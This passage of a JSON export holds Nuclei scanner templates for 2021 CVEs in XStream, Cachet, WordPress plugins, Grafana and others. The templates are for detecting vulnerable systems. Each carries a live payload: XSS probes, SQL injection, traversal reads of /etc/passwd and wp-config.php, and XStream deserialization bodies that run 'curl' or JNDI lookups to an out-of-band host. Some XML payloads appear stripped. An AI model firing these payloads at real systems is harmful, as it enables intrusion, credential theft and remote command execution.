defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2021/Aug/20\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38702\n - http://www.cyberoamworks.com/NetGenie-Home.asp\n - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-38702\n cwe-id: CWE-79\n epss-score: 0.00626\n epss-percentile: 0.76687\n cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cyberoamworks\n product: netgenie_c0101b1-20141120-ng11vo_firmware\n tags: cve2021,cve,cyberoam,netgenie,xss,router,seclists,packetstorm,cyberoamworks\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dab8ab75c1d3700a4c024ce898811f0c0b7996a779ae942f9fc9188869df37cd02210081e4282e11fdf1602ccae821ef099b54a525e0b35d859eda274a52c43b18dbd2:922c64590222798bb761d5b6d8e72950", "hash": "62d40091834bf3a9c3bf2e5173411450", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308395" }, "name": "CVE-2021-38704.yaml", "content": "id: CVE-2021-38704\n\ninfo:\n name: ClinicCases 7.3.3 Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudonoodle/CVE-2021-38704\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38704\n - https://github.com/judsonmitchell/ClinicCases/releases\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-38704\n cwe-id: CWE-79\n epss-score: 0.00141\n epss-percentile: 0.48901\n cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cliniccases\n product: cliniccases\n shodan-query: http.title:\"ClinicCases\",html:\"/cliniccases/\"\n tags: cve,cve2021,xss,cliniccases\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a40d9a2b0cb51dca3b3b675cf715f18ccc4bd7714edd7220f7ec9bd934962f330220442c8f143684b18004b46f89d1886b6905cbb55977566ce1452887fcfd509d4f:922c64590222798bb761d5b6d8e72950", "hash": "d7f04ed97d5814f6fcccb02a221a17f1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308396" }, "name": "CVE-2021-38751.yaml", "content": "id: CVE-2021-38751\n\ninfo:\n name: ExponentCMS <= 2.6 - Host Header Injection\n author: dwisiswant0\n severity: medium\n description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM.\n impact: |\n An attacker can manipulate the Host header to perform various attacks, including phishing, session hijacking, and cache poisoning.\n remediation: |\n Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-38751\n - https://github.com/exponentcms/exponent-cms/issues/1544\n - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2021-38751\n cwe-id: CWE-116\n epss-score: 0.00242\n epss-percentile: 0.62095\n cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: exponentcms\n product: exponentcms\n tags: cve2021,cve,exponentcms\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n Host: '{{randstr}}.tld'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{randstr}}.tld'\n - 'EXPONENT.PATH'\n - 'EXPONENT.URL'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d403330f10efac52c9115d6f86b8203afbd89a11548fcabd8cbb223b1901297b022100f557cc58343805a3b938dfc6b41aa4bdc6656b57ac2bfad9ed9eab9f15359a89:922c64590222798bb761d5b6d8e72950", "hash": "8c3c330062675ed86408940875c693a7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308397" }, "name": "CVE-2021-39141.yaml", "content": "id: CVE-2021-39141\n\ninfo:\n name: XStream 1.4.18 - Remote Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39141.\n reference:\n - http://x-stream.github.io/CVE-2021-39141.html\n - https://x-stream.github.io/CVE-2021-39141.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39141\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39141\n cwe-id: CWE-434\n epss-score: 0.25418\n epss-percentile: 0.96584\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2021,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n java.lang.Comparable\n \n \n false\n \n \n \n \n java.lang.Comparable\n compareTo\n \n java.lang.Object\n \n \n \n \n \n 0\n \n \n PLAIN\n \n \n \n false\n \n int\n \n hash\n java.lang.String\n \n \n false\n \n \n hash\n \n \n \n java.lang.String\n \n javax.naming.InitialContext\n doLookup\n \n java.lang.String\n \n \n \n \n \n \n serialPersistentFields\n \n [Ljava.io.ObjectStreamField;\n \n serialPersistentFields\n java.lang.String\n \n \n \n \n CASE_INSENSITIVE_ORDER\n \n java.util.Comparator\n \n CASE_INSENSITIVE_ORDER\n java.lang.String\n \n \n \n \n serialVersionUID\n \n long\n \n serialVersionUID\n java.lang.String\n \n \n \n \n value\n \n [C\n \n value\n java.lang.String\n \n \n \n \n hash\n \n int\n \n \n \n \n \n \n serialPersistentFields\n \n [Ljava.io.ObjectStreamField;\n \n \n \n \n CASE_INSENSITIVE_ORDER\n \n java.util.Comparator\n \n \n \n \n serialVersionUID\n \n long\n \n \n \n \n value\n \n [C\n \n \n \n \n hash\n \n \n \n false\n java.lang.String\n \n \n \n \n java.lang.Object\n \n false\n \n false\n \n \n \n false\n \n \n \n \n \n \n \n false\n false\n \n \n \n \n \n ldap://{{interactsh-url}}/#evil\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 490a00463044022053f0426292580652f55e357f2b98bfc3e5eeb27cdf9a41d9687c48bc8ec58bf7022066c4195bc224aeee315f7711243b2ddb5212f9f4a9a41ac581fd5066d8a9b5c7:922c64590222798bb761d5b6d8e72950", "hash": "e8d54bf4f01e15413bb70c62cafd8a12", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308398" }, "name": "CVE-2021-39144.yaml", "content": "id: CVE-2021-39144\n\ninfo:\n name: XStream 1.4.18 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39144.\n reference:\n - https://x-stream.github.io/CVE-2021-39144.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-j9h8-phrw-h4fh\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/cve-2021-39144\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39144\n cwe-id: CWE-306,CWE-502\n epss-score: 0.96272\n epss-percentile: 0.99425\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,kev,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n java.lang.Comparable\n \n true\n java.lang.Comparable\n \n \n \n java.lang.Comparable\n compareTo\n \n java.lang.Object\n \n \n \n \n \n java.lang.Runtime\n exec\n \n java.lang.String\n \n \n \n \n \n \n \n curl http://{{interactsh-url}}\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 490a0046304402200e05acfab9074cc5b7b2f6b1f1ba33cf96f6e5fdd55e6e4ff88cea344d39ad3f02205722ce0e0e82affb85fe8a8b2843770329e2cb843008904feebf64127bb7ddc9:922c64590222798bb761d5b6d8e72950", "hash": "1e0c4588d87bd4fb6517c642870cd985", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308399" }, "name": "CVE-2021-39146.yaml", "content": "id: CVE-2021-39146\n\ninfo:\n name: XStream 1.4.18 - Arbitrary Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade XStream to a version that is not affected by CVE-2021-39146.\n reference:\n - https://x-stream.github.io/CVE-2021-39146.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39146\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39146\n cwe-id: CWE-434\n epss-score: 0.27391\n epss-percentile: 0.96375\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n test\n \n \n \n \n 0.75\n 525\n \n 700\n 0\n \n \n \n zh_CN\n \n \n \n \n \n \n \n \n \n \n 0.75\n 525\n \n 700\n 1\n lazyValue\n \n javax.naming.InitialContext\n doLookup\n \n ldap://{{interactsh-url}}/#evil\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n test\n \n test\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100833e5bcb2f394e9487e537025c26bcfbcc2b936b06eb1849e65851e1d44d86da022100b217b08be73723a93bb1293669baa2cb9859cc6954ad0ac642642a99e07df0d8:922c64590222798bb761d5b6d8e72950", "hash": "326aae365c7fc42cdc8b17e2f25e7f83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839a" }, "name": "CVE-2021-39152.yaml", "content": "id: CVE-2021-39152\n\ninfo:\n name: XStream <1.4.18 - Server-Side Request Forgery\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.\n remediation: |\n Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability.\n reference:\n - https://x-stream.github.io/CVE-2021-39152.html\n - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2\n - https://security.netapp.com/advisory/ntap-20210923-0003/\n - https://nvd.nist.gov/vuln/detail/cve-2021-39152\n - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 8.5\n cve-id: CVE-2021-39152\n cwe-id: CWE-502\n epss-score: 0.01242\n epss-percentile: 0.83992\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,xstream,ssrf,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n http://{{interactsh-url}}/internal/\n GBK\n 1111\n b\n 0\n 0\n \n \n \n \n \n http://{{interactsh-url}}/internal/\n \n 1111\n b\n 0\n 0\n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950", "hash": "241626789ab83dd2a204329f3f447181", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839b" }, "name": "CVE-2021-39165.yaml", "content": "id: CVE-2021-39165\n\ninfo:\n name: Cachet <=2.3.18 - SQL Injection\n author: tess\n severity: medium\n description: |\n Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html\n - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6\n - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39165\n - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-39165\n cwe-id: CWE-287\n epss-score: 0.04786\n epss-percentile: 0.92528\n cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: chachethq\n product: cachet\n shodan-query: http.favicon.hash:-1606065523\n tags: cve,cve2021,cachet,sqli,chachethq\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--\"\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"pagination\") && contains(body, \"data\")'\n condition: and\n# digest: 4a0a0047304502204b3206034be2f774b8b91870d6386c1beadd44650a52a79e394ef377b8fd8a7e022100be385f84a4f30de70a9f03f2813758d984dbe67e2d2ddbdf8ffb06f772ea2772:922c64590222798bb761d5b6d8e72950", "hash": "f5b53e8007345143885b6b61971488b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839c" }, "name": "CVE-2021-39211.yaml", "content": "id: CVE-2021-39211\n\ninfo:\n name: GLPI 9.2/<9.5.6 - Information Disclosure\n author: dogasantos,noraj\n severity: medium\n description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information.\n remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.\n reference:\n - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825\n - https://github.com/glpi-project/glpi/releases/tag/9.5.6\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39211\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-39211\n cwe-id: CWE-200,NVD-CWE-noinfo\n epss-score: 0.00161\n epss-percentile: 0.51768\n cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: glpi-project\n product: glpi\n tags: cve,cve2021,glpi,exposure,glpi-project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ajax/telemetry.php\"\n - \"{{BaseURL}}/glpi/ajax/telemetry.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"uuid\":'\n - '\"glpi\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe062755f4b07576ae5328bf856241f5ea8ffcd7471aee2f20d0e81118a750f7022100963f6ecde4366021315b1d07dede1e4330917c47e2ac4b7068b9c2496b1cc675:922c64590222798bb761d5b6d8e72950", "hash": "67e11cb43d78fb9caee7d169844c13cb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839d" }, "name": "CVE-2021-39226.yaml", "content": "id: CVE-2021-39226\n\ninfo:\n name: Grafana Snapshot - Authentication Bypass\n author: Evan Rubinstein\n severity: high\n description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).\n impact: |\n An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature.\n remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.'\n reference:\n - https://github.com/advisories/GHSA-69j6-29vr-p3j9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39226\n - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269\n - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/\n - http://www.openwall.com/lists/oss-security/2021/10/05/4\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n cvss-score: 7.3\n cve-id: CVE-2021-39226\n cwe-id: CWE-287\n epss-score: 0.97206\n epss-percentile: 0.9981\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/snapshots/:key\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\"isSnapshot\":true'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022018328f164b60172c333f6c40599f821c588213819031a1e9a2fc07c9e6f3fe74022100dc1c8beb95c9ea2da8dbf9b90d938190782ff387c7a21e0c44387234f04094fc:922c64590222798bb761d5b6d8e72950", "hash": "4b49d78dc52e7463b002f4efbc1bbbaa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839e" }, "name": "CVE-2021-39312.yaml", "content": "id: CVE-2021-39312\n\ninfo:\n name: WordPress True Ranker <2.2.4 - Local File Inclusion\n author: DhiyaneshDK\n severity: high\n description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.\n remediation: Fixed in version 2.2.4\n reference:\n - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312\n - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39312\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39312\n cwe-id: CWE-22\n epss-score: 0.16864\n epss-percentile: 0.95927\n cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: trueranker\n product: true_ranker\n framework: wordpress\n tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"DB_NAME\"\n - \"DB_PASSWORD\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022031ccf1b4c1f46397810347618011728678183100da2fbf4e931582f3f08446bd02202f1d6f5de6611bfc1c9f47b014121e13f12ae3cca0a7027b1d8da7f438c96dbf:922c64590222798bb761d5b6d8e72950", "hash": "1266c5e2c87f21db95f0b2aa51b3f8f1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30839f" }, "name": "CVE-2021-39316.yaml", "content": "id: CVE-2021-39316\n\ninfo:\n name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion\n author: daffainfo\n severity: high\n description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.\n impact: |\n Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure.\n remediation: |\n Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability.\n reference:\n - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316\n - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39316\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-39316\n cwe-id: CWE-22\n epss-score: 0.38985\n epss-percentile: 0.96896\n cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: digitalzoomstudio\n product: zoomsounds\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ecde707e560c69d1ad2644895aa0a7df00b9784807eff673f6e8d4baddf59e71022000ef2d9c907007436551ec1a60f0f69c06d4fec7eff6394f6bb9c12a00b609c0:922c64590222798bb761d5b6d8e72950", "hash": "c5c7730243252a51ffb4146b2de6cc87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083a0" }, "name": "CVE-2021-39320.yaml", "content": "id: CVE-2021-39320\n\ninfo:\n name: WordPress Under Construction <1.19 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: |\n WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP.\n impact: |\n The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320\n - https://nvd.nist.gov/vuln/detail/CVE-2021-39320\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-39320\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58322\n cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: underconstruction_project\n product: underconstruction\n framework: wordpress\n tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php/\">/?page=under-construction HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'action=\"/wp-admin/admin.php/\">'\n - 'under-construction'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210093c2ed5b393a57e102799fbb901df39eee9afaf5c1113fb777dd86d1218e7434022100a0402cece1c5f7f2527b421dfde31d2a5ac624e7223448265e76ab4c24d85271:922c64590222798bb761d5b6d8e72950", 